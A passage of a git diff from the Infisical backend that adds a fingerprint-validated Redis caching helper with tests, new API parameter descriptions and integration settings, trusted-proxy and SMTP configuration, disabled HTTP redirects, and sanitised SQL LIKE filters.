7 days + LicenseCloudPlanInSeconds: 300, // 5 minutes + AiMcpEndpointOAuthFlowInSeconds: 300, // 5 minutes + AiMcpServerOAuthSessionInSeconds: 600, // 10 minutes + DashboardCacheInSeconds: 600, // 10 minutes + ProjectEnvironmentOperationMarkerInSeconds: 10, + UserMfaUnlockEmailSentInSeconds: 300, // 5 minutes + TelemetryGroupIdentifyInSeconds: 3600, // 1 hour + TelemetryAggregatedEventInSeconds: 600, // 10 minutes + SecretEtagInSeconds: 900, // 15 minutes + PkiAcmeNonceInSeconds: 300, // 5 minutes + GatewayRelayCredentialInSeconds: 600, // 10 minutes - TURN credential lifetime + SecretReplicationSuccessInSeconds: 10 }; type TDeleteItems = { diff --git a/backend/src/lib/api-docs/constants.ts b/backend/src/lib/api-docs/constants.ts index 77206111c08..e09b964a560 100644 --- a/backend/src/lib/api-docs/constants.ts +++ b/backend/src/lib/api-docs/constants.ts @@ -1025,7 +1025,19 @@ export const PROJECTS = { metadata: "Filter by metadata key-value pairs. Each entry should have a key (required) and optionally a value to match against.", extendedKeyUsage: - "Filter by extended key usage. Only certificates containing this EKU will be returned (e.g. 'codeSigning', 'serverAuth')." + "Filter by extended key usage. Only certificates containing this EKU will be returned (e.g. 'codeSigning', 'serverAuth').", + keyAlgorithm: "Filter by key algorithm (e.g. 'RSA_2048', 'EC_prime256v1').", + signatureAlgorithm: "Filter by signature algorithm (e.g. 'RSA-SHA256', 'ECDSA-SHA256').", + keySizes: "Filter by key sizes in bits (e.g. [2048, 4096]).", + caIds: "Filter by certificate authority IDs.", + enrollmentTypes: "Filter by enrollment types (e.g. 'api', 'est', 'acme', 'scep').", + source: "Filter by certificate source ('issued', 'discovered', 'imported').", + notAfterFrom: "Filter certificates expiring on or after this date.", + notAfterTo: "Filter certificates expiring on or before this date.", + notBeforeFrom: "Filter certificates issued on or after this date.", + notBeforeTo: "Filter certificates issued on or before this date.", + sortBy: "Column to sort by (e.g. 'notAfter', 'notBefore', 'commonName').", + sortOrder: "Sort direction: 'asc' or 'desc'." }, LIST_PKI_SUBSCRIBERS: { projectId: "The ID of the project to list PKI subscribers for." @@ -2459,6 +2471,10 @@ export const KMS = { keyId: "The ID of the key to export the private key or key material for." }, + BULK_EXPORT_PRIVATE_KEYS: { + keyIds: "An array of KMS key IDs to export. Maximum 100 keys per request." + }, + SIGN: { keyId: "The ID of the key to sign the data with.", data: "The data in string format to be signed (base64 encoded).", @@ -2543,6 +2559,12 @@ export const CertificateAuthorities = { certificateAuthorityArn: `The ARN of the AWS Private Certificate Authority to use for issuing certificates.`, region: `The AWS region where the Private Certificate Authority is located.` }, + AWS_ACM_PUBLIC_CA: { + appConnectionId: `The ID of the AWS App Connection to use for authenticating with AWS Certificate Manager (ACM). This connection must have permissions to request, describe, export, renew, and delete certificates.`, + dnsAppConnectionId: `The ID of the AWS App Connection to use for creating and managing Route 53 CNAME records required for ACM domain validation.`, + hostedZoneId: `The Route 53 hosted zone ID to use for ACM DNS validation CNAME records.`, + region: `The AWS region to use for the ACM API calls.` + }, INTERNAL: { type: "The type of CA to create.", friendlyName: "A friendly name for the CA.", @@ -2628,6 +2650,16 @@ export const AppConnections = { VERCEL: { apiToken: "The API token used to authenticate with Vercel." }, + ONA: { + personalAccessToken: "The Personal Access Token used to authenticate with Ona." + }, + DIGICERT: { + apiKey: "The CertCentral API Key used to authenticate with DigiCert.", + region: "The CertCentral region the API key belongs to (us or eu)." + }, + TRAVISCI: { + apiToken: "The API token used to authenticate with Travis CI." + }, CAMUNDA: { clientId: "The client ID used to authenticate with Camunda.", clientSecret: "The client secret used to authenticate with Camunda." @@ -2778,6 +2810,14 @@ export const AppConnections = { VENAFI: { apiKey: "The API key used to authenticate with Venafi TLS Protect Cloud.", region: "The region of your Venafi TLS Protect Cloud instance (e.g., 'us', 'eu')." + }, + VENAFI_TPP: { + tppUrl: "The HTTPS URL of the Venafi TPP instance (e.g., 'https://tpp.example.com'). Must use HTTPS.", + clientId: + "The OAuth client ID registered in the Venafi TPP API Integration. Used for token-based authentication.", + username: + "The username used to authenticate with Venafi TPP. Supports formats: 'DOMAIN\\\\username', 'username@domain.com', or local usernames.", + password: "The password used to authenticate with Venafi TPP." } } }; @@ -2935,6 +2975,10 @@ export const SecretSyncs = { scope: "The Terraform Cloud scope that secrets should be synced to.", category: "The Terraform Cloud category that secrets should be synced to." }, + ONA: { + projectId: "The Ona project ID to sync secrets to.", + projectName: "An optional display name for the Ona project." + }, VERCEL: { app: "The ID of the Vercel app to sync secrets to.", appName: "The name of the Vercel app to sync secrets to.", @@ -2943,8 +2987,13 @@ export const SecretSyncs = { teamId: "The ID of the Vercel team to sync secrets to.", teamName: "The name of the team to sync the secrets to. This is an optional field only intended for display purposes.", - targetEnvironments: "An optional array of Vercel environments to add shared environment variables to.", - targetProjects: "An optional array of Vercel projects to add shared environment variables to." + targetEnvironments: + "An optional array of Vercel default environments (development, preview, production) to add shared environment variables to.", + applyToAllCustomEnvironments: + "Whether to apply shared environment variables to all custom environments in the team.", + targetProjects: "An optional array of Vercel projects to add shared environment variables to.", + sensitive: + "Whether to create Vercel environment variables as Sensitive (cannot be read back). Not allowed when targeting the Development environment." }, LARAVEL_FORGE: { orgSlug: "The slug of the Laravel Forge org to sync secrets to.", @@ -3066,6 +3115,12 @@ export const SecretSyncs = { projectId: "The ID of the project on the external Infisical instance to sync secrets to.", environment: "The environment slug on the external Infisical instance to sync secrets to.", secretPath: "The secret path on the external Infisical instance to sync secrets to." + }, + TRAVIS_CI: { + repositoryId: "The ID of the Travis CI repository to sync secrets to.", + repositorySlug: "The slug (owner/repo) of the Travis CI repository to sync secrets to.", + branch: + "The branch of the Travis CI repository to sync secrets to. If omitted, secrets sync to the repository-level scope." } } }; @@ -3217,6 +3272,10 @@ export const SecretRotations = { limitReset: "The type of limit reset for the API key (daily, weekly, monthly, or null for no reset).", includeByokInLimit: "Whether to include BYOK (Bring Your Own Key) usage in the spending limit. When enabled, usage from your own provider keys counts toward this key's limit. See OpenRouter BYOK docs for details." + }, + SUPABASE_API_KEY: { + projectRef: "The reference ID of the Supabase project to rotate the API key for.", + keyType: "The type of the API key to rotate (e.g. publishable, secret)." } }, SECRETS_MAPPING: { @@ -3277,6 +3336,9 @@ export const SecretRotations = { }, OPEN_ROUTER_API_KEY: { apiKey: "The name of the secret that the rotated OpenRouter API key will be mapped to." + }, + SUPABASE_API_KEY: { + apiKey: "The name of the secret that the rotated Supabase API key will be mapped to." } } }; diff --git a/backend/src/lib/aws/error.ts b/backend/src/lib/aws/error.ts new file mode 100644 index 00000000000..c0e3744ba5c --- /dev/null +++ b/backend/src/lib/aws/error.ts @@ -0,0 +1,4 @@ +// AWS SDK v3 exception classes are only generated for errors explicitly modeled in a service's API definition. +// Generic errors like ThrottlingException are not modeled by all services (e.g. Secrets Manager, KMS), +// so they cannot be caught with instanceof. This utility checks the error name directly as a fallback. +export const isAwsError = (error: unknown, name: string): boolean => (error as { name: string }).name === name; diff --git a/backend/src/lib/cache/with-cache.test.ts b/backend/src/lib/cache/with-cache.test.ts index 5048d32eb59..6a261912a3a 100644 --- a/backend/src/lib/cache/with-cache.test.ts +++ b/backend/src/lib/cache/with-cache.test.ts @@ -215,6 +215,123 @@ describe("withCache", () => { ); }); + it("should compute TTL from fetcher result when ttlSeconds is a function", async () => { + mockKeyStore.getItem.mockResolvedValue(null); + const data = { expiresInSeconds: 42 }; + const fetcher = vi.fn().mockResolvedValue(data); + const ttlFn = vi.fn((result: typeof data) => result.expiresInSeconds); + + await withCache({ + keyStore: mockKeyStore, + key: "dynamic-ttl-key", + ttlSeconds: ttlFn, + fetcher + }); + + expect(ttlFn).toHaveBeenCalledWith(data); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("dynamic-ttl-key", 42, JSON.stringify(data)); + }); + + it("should not call TTL function on cache hit", async () => { + const data = { cached: true }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(data)); + const fetcher = vi.fn(); + const ttlFn = vi.fn(() => 100); + + await withCache({ + keyStore: mockKeyStore, + key: "hit-dynamic-ttl-key", + ttlSeconds: ttlFn, + fetcher + }); + + expect(ttlFn).not.toHaveBeenCalled(); + expect(fetcher).not.toHaveBeenCalled(); + }); + + it("should call reviver on cache hit to mutate parsed value", async () => { + const cached = { date: "2026-04-13T00:00:00.000Z", value: 10 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn(); + const reviver = vi.fn((parsed: { date: string | Date; value: number }) => { + // eslint-disable-next-line no-param-reassign + parsed.date = new Date(parsed.date as string); + }); + + const result = await withCache<{ date: string | Date; value: number }>({ + keyStore: mockKeyStore, + key: "reviver-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(reviver).toHaveBeenCalledOnce(); + expect(result.date).toBeInstanceOf(Date); + expect((result.date as Date).toISOString()).toBe("2026-04-13T00:00:00.000Z"); + expect(fetcher).not.toHaveBeenCalled(); + }); + + it("should use reviver's return value when it returns a new object", async () => { + const cached = { value: 1 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn(); + const reviver = vi.fn((parsed: { value: number }) => ({ value: parsed.value * 2 })); + + const result = await withCache<{ value: number }>({ + keyStore: mockKeyStore, + key: "reviver-return-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(result.value).toBe(2); + }); + + it("should not call reviver on cache miss", async () => { + mockKeyStore.getItem.mockResolvedValue(null); + const fetcher = vi.fn().mockResolvedValue({ fresh: true }); + const reviver = vi.fn(); + + await withCache({ + keyStore: mockKeyStore, + key: "miss-reviver-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(reviver).not.toHaveBeenCalled(); + expect(fetcher).toHaveBeenCalledOnce(); + }); + + it("should fall back to fetcher when reviver throws", async () => { + const { logger } = await import("@app/lib/logger"); + const cached = { value: 1 }; + const fresh = { value: 99 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn().mockResolvedValue(fresh); + const reviver = vi.fn(() => { + throw new Error("reviver boom"); + }); + + const result = await withCache({ + keyStore: mockKeyStore, + key: "reviver-throws-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(result).toEqual(fresh); + expect(fetcher).toHaveBeenCalledOnce(); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "reviver-throws-key" }), + expect.stringContaining("cache parse failed") + ); + }); + it("should log warnings on cache read and write failures", async () => { const { logger } = await import("@app/lib/logger"); @@ -240,3 +357,294 @@ describe("withCache", () => { ); }); }); + +describe("withCacheFingerprint", () => { + let mockKeyStore: { + getItem: ReturnType; + setItemWithExpiry: ReturnType; + }; + + beforeEach(() => { + mockKeyStore = { + getItem: vi.fn(), + setItemWithExpiry: vi.fn().mockResolvedValue("OK") + }; + }); + + afterEach(() => { + vi.clearAllMocks(); + }); + + it("should return cached data on marker and data hit (0 DB reads)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "user-123", permissions: ["read", "write"] }; + const cachedData = { fingerprint: "fp-abc", payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return "1"; + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn(); + const dataFetcher = vi.fn(); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).not.toHaveBeenCalled(); + expect(dataFetcher).not.toHaveBeenCalled(); + expect(mockKeyStore.setItemWithExpiry).not.toHaveBeenCalled(); + }); + + it("should revalidate and reset marker on marker miss + data hit + fingerprint match (1 DB read)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "user-456", permissions: ["admin"] }; + const fingerprint = "fp-def"; + const cachedData = { fingerprint, payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return null; // Marker expired + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn(); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).not.toHaveBeenCalled(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should full re-fetch on fingerprint mismatch (1 heavy DB read)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const oldPayload = { id: "user-789", permissions: ["read"] }; + const newPayload = { id: "user-789", permissions: ["read", "write"] }; + const oldFingerprint = "fp-old"; + const newFingerprint = "fp-new"; + const oldCachedData = { fingerprint: oldFingerprint, payload: oldPayload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return null; + if (key === "data-key") return JSON.stringify(oldCachedData); + return null; + }); + + const fingerprintFetcher = vi.fn().mockResolvedValue(newFingerprint); + const dataFetcher = vi.fn().mockResolvedValue(newPayload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(newPayload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith( + "data-key", + 600, + JSON.stringify({ fingerprint: newFingerprint, payload: newPayload }) + ); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should full re-fetch on marker miss + data miss", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "new-user", permissions: ["viewer"] }; + const fingerprint = "fp-fresh"; + + mockKeyStore.getItem.mockResolvedValue(null); // Both marker and data miss + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith( + "data-key", + 600, + JSON.stringify({ fingerprint, payload }) + ); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should call reviver on cache hits", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { date: "2026-04-13T00:00:00.000Z", value: 42 }; + const cachedData = { fingerprint: "fp-date", payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return "1"; + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn(); + const dataFetcher = vi.fn(); + const reviver = vi.fn((parsed: { date: string | Date; value: number }) => { + // eslint-disable-next-line no-param-reassign + parsed.date = new Date(parsed.date as string); + }); + + const result = await withCacheFingerprint<{ date: string | Date; value: number }>({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher, + reviver + }); + + expect(reviver).toHaveBeenCalledOnce(); + expect(result.date).toBeInstanceOf(Date); + expect((result.date as Date).toISOString()).toBe("2026-04-13T00:00:00.000Z"); + }); + + it("should gracefully handle Redis read failures", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "fallback-user" }; + const fingerprint = "fp-fallback"; + + mockKeyStore.getItem.mockRejectedValue(new Error("Redis connection lost")); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "marker-key" }), + expect.stringContaining("marker read failed") + ); + }); + + it("should bypass cache and call dataFetcher directly on fingerprint fetch failure", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "rescue-user" }; + + mockKeyStore.getItem.mockResolvedValue(null); + + const fingerprintFetcher = vi.fn().mockRejectedValue(new Error("DB timeout")); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).not.toHaveBeenCalled(); + expect(logger.error).toHaveBeenCalledWith( + expect.objectContaining({ err: expect.any(Error) as Error }) as unknown as Record, + expect.stringContaining("fingerprint fetch failed") + ); + }); + + it("should not block on Redis write failures", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "write-fail-user" }; + const fingerprint = "fp-write"; + + mockKeyStore.getItem.mockResolvedValue(null); + mockKeyStore.setItemWithExpiry.mockRejectedValue(new Error("Redis write timeout")); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "data-key" }), + expect.stringContaining("data write failed") + ); + }); + + it("should propagate dataFetcher errors", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + + mockKeyStore.getItem.mockResolvedValue(null); + + const fingerprintFetcher = vi.fn().mockResolvedValue("fp-error"); + const dataFetcher = vi.fn().mockRejectedValue(new Error("Database query failed")); + + await expect( + withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }) + ).rejects.toThrow("Database query failed"); + }); +}); diff --git a/backend/src/lib/cache/with-cache.ts b/backend/src/lib/cache/with-cache.ts index 901f9a1399c..8b1747f524d 100644 --- a/backend/src/lib/cache/with-cache.ts +++ b/backend/src/lib/cache/with-cache.ts @@ -1,11 +1,55 @@ import { TKeyStoreFactory } from "@app/keystore/keystore"; import { logger } from "@app/lib/logger"; +type TCacheKeyStore = Pick; + +/** Read a raw string from Redis, returning null on miss or error. */ +const cacheGet = async (keyStore: TCacheKeyStore, key: string, errMsg: string): Promise => { + try { + return await keyStore.getItem(key); + } catch (err) { + logger.warn({ key, err }, `${errMsg} [key=${key}]`); + return null; + } +}; + +/** Write to Redis with the given TTL, swallowing errors. */ +const cacheSet = async ( + keyStore: TCacheKeyStore, + key: string, + ttlSeconds: number, + value: string, + errMsg: string +): Promise => { + try { + await keyStore.setItemWithExpiry(key, ttlSeconds, value); + } catch (err) { + logger.warn({ key, err }, `${errMsg} [key=${key}]`); + } +}; + +/** Apply an optional reviver; returns the revived value or the original if the reviver returns void. */ +const applyReviver = (value: T, reviver?: (parsed: T) => T | void): T => { + if (!reviver) return value; + const revived = reviver(value); + return revived === undefined ? value : revived; +}; + type TWithCacheOpts = { - keyStore: Pick; + keyStore: TCacheKeyStore; key: string; - ttlSeconds: number; + /** + * Cache TTL in seconds. Can be a fixed number, or a function of the fetched + * result (e.g. to cap the TTL at the nearest expiry time of the data). + */ + ttlSeconds: number | ((result: T) => number); fetcher: () => Promise; + /** + * Optional post-parse callback to revive non-JSON-safe fields (e.g. Date + * objects) on cache hit. Called with the parsed value; may mutate it or + * return a new value. If it throws, the value is treated as a cache miss. + */ + reviver?: (parsed: T) => T | void; }; /** @@ -13,17 +57,12 @@ type TWithCacheOpts = { * or invalid cached JSON, and writes the result back to Redis. Redis write errors are caught and logged * β€” the fetcher is always the source of truth. */ -export const withCache = async ({ keyStore, key, ttlSeconds, fetcher }: TWithCacheOpts): Promise => { - let cached: string | null = null; - try { - cached = await keyStore.getItem(key); - } catch (err) { - logger.warn({ key, err }, `withCache: cache read failed, falling back to fetcher [key=${key}]`); - } +export const withCache = async ({ keyStore, key, ttlSeconds, fetcher, reviver }: TWithCacheOpts): Promise => { + const cached = await cacheGet(keyStore, key, "withCache: cache read failed, falling back to fetcher"); if (cached !== null) { try { - return JSON.parse(cached) as T; + return applyReviver(JSON.parse(cached) as T, reviver); } catch (err) { logger.warn({ key, err }, `withCache: cache parse failed, falling back to fetcher [key=${key}]`); } @@ -31,11 +70,105 @@ export const withCache = async ({ keyStore, key, ttlSeconds, fetcher }: TWith const result = await fetcher(); + const ttl = typeof ttlSeconds === "function" ? ttlSeconds(result) : ttlSeconds; + await cacheSet(keyStore, key, ttl, JSON.stringify(result), "withCache: cache write failed"); + + return result; +}; + +type TWithCacheFingerprintOpts = { + keyStore: TCacheKeyStore; + dataKey: string; + markerKey: string; + markerTtlSeconds: number; + dataTtlSeconds: number; + fingerprintFetcher: () => Promise; + dataFetcher: () => Promise; + /** + * Optional post-parse callback to revive non-JSON-safe fields (e.g. Date + * objects) on cache hit. Called with the parsed payload; may mutate it or + * return a new value. If it throws, the value is treated as a cache miss. + */ + reviver?: (parsed: T) => T | void; +}; + +type TCachedData = { + fingerprint: string; + payload: T; +}; + +/** + * Two-tier cache-aside helper with fingerprint validation: + * - Short-lived marker (e.g. 10s) tracks recent validation + * - Long-lived data (e.g. 10m) holds the actual payload + fingerprint + * + * On marker hit: serve cached data directly (0 DB reads) + * On marker miss: compute lightweight fingerprint (1 DB read); if it matches cached data, reset marker and serve; otherwise, full re-fetch + */ +export const withCacheFingerprint = async ({ + keyStore, + dataKey, + markerKey, + markerTtlSeconds, + dataTtlSeconds, + fingerprintFetcher, + dataFetcher, + reviver +}: TWithCacheFingerprintOpts): Promise => { + const [markerValue, cachedDataStr] = await Promise.all([ + cacheGet(keyStore, markerKey, "withCacheFingerprint: marker read failed"), + cacheGet(keyStore, dataKey, "withCacheFingerprint: data read failed") + ]); + + // Marker + data hit: return cached data directly (fast path, 0 DB reads) + if (markerValue !== null && cachedDataStr !== null) { + try { + const { payload } = JSON.parse(cachedDataStr) as TCachedData; + return applyReviver(payload, reviver); + } catch (err) { + logger.warn( + { key: dataKey, err }, + `withCacheFingerprint: cached data parse failed, falling back to fingerprint check [key=${dataKey}]` + ); + } + } + + // Marker expired or cache miss β€” compute fingerprint (1 lightweight DB read) + let currentFingerprint: string; try { - await keyStore.setItemWithExpiry(key, ttlSeconds, JSON.stringify(result)); + currentFingerprint = await fingerprintFetcher(); } catch (err) { - logger.warn({ key, err }, `withCache: cache write failed [key=${key}]`); + logger.error({ err }, `withCacheFingerprint: fingerprint fetch failed, bypassing cache`); + return dataFetcher(); } + // Data exists and fingerprint matches: reset marker and return (1 DB read total) + if (cachedDataStr !== null) { + try { + const cachedData = JSON.parse(cachedDataStr) as TCachedData; + if (cachedData.fingerprint === currentFingerprint) { + await cacheSet(keyStore, markerKey, markerTtlSeconds, "1", "withCacheFingerprint: marker reset failed"); + return applyReviver(cachedData.payload, reviver); + } + } catch (err) { + logger.error( + { key: dataKey, err }, + `withCacheFingerprint: cached data parse failed, falling back to full fetch [key=${dataKey}]` + ); + } + } + + // Fingerprint mismatch or no cached data β€” full re-fetch + const result = await dataFetcher(); + + await cacheSet( + keyStore, + dataKey, + dataTtlSeconds, + JSON.stringify({ fingerprint: currentFingerprint, payload: result }), + "withCacheFingerprint: data write failed" + ); + await cacheSet(keyStore, markerKey, markerTtlSeconds, "1", "withCacheFingerprint: marker write failed"); + return result; }; diff --git a/backend/src/lib/config/env.ts b/backend/src/lib/config/env.ts index 63ad119b5d2..af23082a903 100644 --- a/backend/src/lib/config/env.ts +++ b/backend/src/lib/config/env.ts @@ -142,6 +142,9 @@ const envSchema = z GENERATE_SANITIZED_SCHEMA: zodStrBool .default("false") .describe("Generate sanitized schema with views after migrations"), + FAIL_ON_SANITIZED_SCHEMA_ERROR: zodStrBool + .default("false") + .describe("Exit startup when sanitized schema generation fails"), SANITIZED_SCHEMA_ROLE: zpStr( z.string().describe("PostgreSQL role to grant read access to the sanitized schema").optional() ), @@ -199,6 +202,14 @@ const envSchema = z SMTP_PASSWORD: zpStr(z.string().optional()), SMTP_FROM_ADDRESS: zpStr(z.string().optional()), SMTP_FROM_NAME: zpStr(z.string().optional().default("Infisical")), + SMTP_HELO_HOST: zpStr( + z + .string() + .optional() + .describe( + "Hostname announced in the SMTP EHLO/HELO greeting. Defaults to the OS hostname, which may not be a valid FQDN inside containers." + ) + ), SMTP_CUSTOM_CA_CERT: zpStr( z.string().optional().describe("Base64 encoded custom CA certificate PEM(s) for the SMTP server") ), @@ -297,6 +308,7 @@ const envSchema = z .transform((val) => val === "true" || IS_PACKAGED) .optional(), INFISICAL_CLOUD: zodStrBool.default("false"), + INFISICAL_DEDICATED: zodStrBool.default("false"), MAINTENANCE_MODE: zodStrBool.default("false"), CAPTCHA_SECRET: zpStr(z.string().optional()), CAPTCHA_SITE_KEY: zpStr(z.string().optional()), @@ -453,6 +465,14 @@ const envSchema = z }) ), + // Reverse Proxy ----------------------------------------------------------------------------- + // Comma-separated list of trusted proxy CIDRs (e.g. "10.0.0.0/8,172.16.0.0/12") or + // proxy-addr aliases ("loopback", "linklocal", "uniquelocal"). When set, requests whose + // socket remote address is NOT in this set will have forwarded-IP headers ignored; the + // socket address is used as the real IP. When unset, legacy first-header-wins behavior + // is preserved for backwards compatibility. + TRUSTED_PROXY_CIDRS: zpStr(z.string().optional()), + /* OracleDB ----------------------------------------------------------------------------- */ TNS_ADMIN: zpStr(z.string().optional()), @@ -938,6 +958,7 @@ export const formatSmtpConfig = () => { return { host: envCfg.SMTP_HOST, port: envCfg.SMTP_PORT, + name: envCfg.SMTP_HELO_HOST, auth: envCfg.SMTP_USERNAME && envCfg.SMTP_PASSWORD ? { user: envCfg.SMTP_USERNAME, pass: envCfg.SMTP_PASSWORD } diff --git a/backend/src/lib/config/request.ts b/backend/src/lib/config/request.ts index b8bd4b282b7..e45874db7d0 100644 --- a/backend/src/lib/config/request.ts +++ b/backend/src/lib/config/request.ts @@ -26,7 +26,7 @@ export function axiosResponseInterceptor(response: AxiosResponse, customLogger: } export function createRequestClient(defaults: CreateAxiosDefaults = {}, retry: IAxiosRetryConfig = {}): AxiosInstance { - const client = axios.create(defaults); + const client = axios.create({ ...defaults, maxRedirects: 0 }); client.interceptors.response.use((response) => axiosResponseInterceptor(response, logger)); diff --git a/backend/src/lib/gateway-v2/gateway-v2.ts b/backend/src/lib/gateway-v2/gateway-v2.ts index 16eb8e8ca7c..3a5a7fcc96c 100644 --- a/backend/src/lib/gateway-v2/gateway-v2.ts +++ b/backend/src/lib/gateway-v2/gateway-v2.ts @@ -1,7 +1,7 @@ import net from "node:net"; import tls from "node:tls"; -import axios from "axios"; +import { isAxiosError } from "axios"; import https from "https"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; @@ -287,7 +287,7 @@ export const withGatewayV2Proxy = async ( } logger.error("Gateway error:", err instanceof Error ? err.message : String(err)); let errorMessage = relayErrorMessage || (err instanceof Error ? err.message : String(err)); - if (axios.isAxiosError(err) && (err.response?.data as { message?: string })?.message) { + if (isAxiosError(err) && (err.response?.data as { message?: string })?.message) { errorMessage = (err.response?.data as { message: string }).message; } diff --git a/backend/src/lib/gateway/gateway.ts b/backend/src/lib/gateway/gateway.ts index 9a4dd789b12..f5d551fa230 100644 --- a/backend/src/lib/gateway/gateway.ts +++ b/backend/src/lib/gateway/gateway.ts @@ -2,7 +2,7 @@ import net from "node:net"; import quicDefault, * as quicModule from "@infisical/quic"; -import axios from "axios"; +import { isAxiosError } from "axios"; import https from "https"; import { crypto } from "@app/lib/crypto/cryptography"; @@ -417,7 +417,7 @@ export const withGatewayProxy = async ( } logger.error(err, "Failed to do gateway"); let errorMessage = proxyErrorMessage || (err as Error)?.message; - if (axios.isAxiosError(err) && (err.response?.data as { message?: string })?.message) { + if (isAxiosError(err) && (err.response?.data as { message?: string })?.message) { errorMessage = (err.response?.data as { message: string }).message; } diff --git a/backend/src/lib/knex/dynamic.ts b/backend/src/lib/knex/dynamic.ts index a57464fac58..0807c52201f 100644 --- a/backend/src/lib/knex/dynamic.ts +++ b/backend/src/lib/knex/dynamic.ts @@ -1,6 +1,7 @@ import { Knex } from "knex"; import { UnauthorizedError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; type TKnexDynamicPrimitiveOperator = | { @@ -47,11 +48,11 @@ export const buildDynamicKnexQuery = ( break; } case "startsWith": { - void queryBuilder.whereILike(filterAst.field, `${filterAst.value}%`); + void queryBuilder.whereILike(filterAst.field, `${sanitizeSqlLikeString(filterAst.value)}%`); break; } case "endsWith": { - void 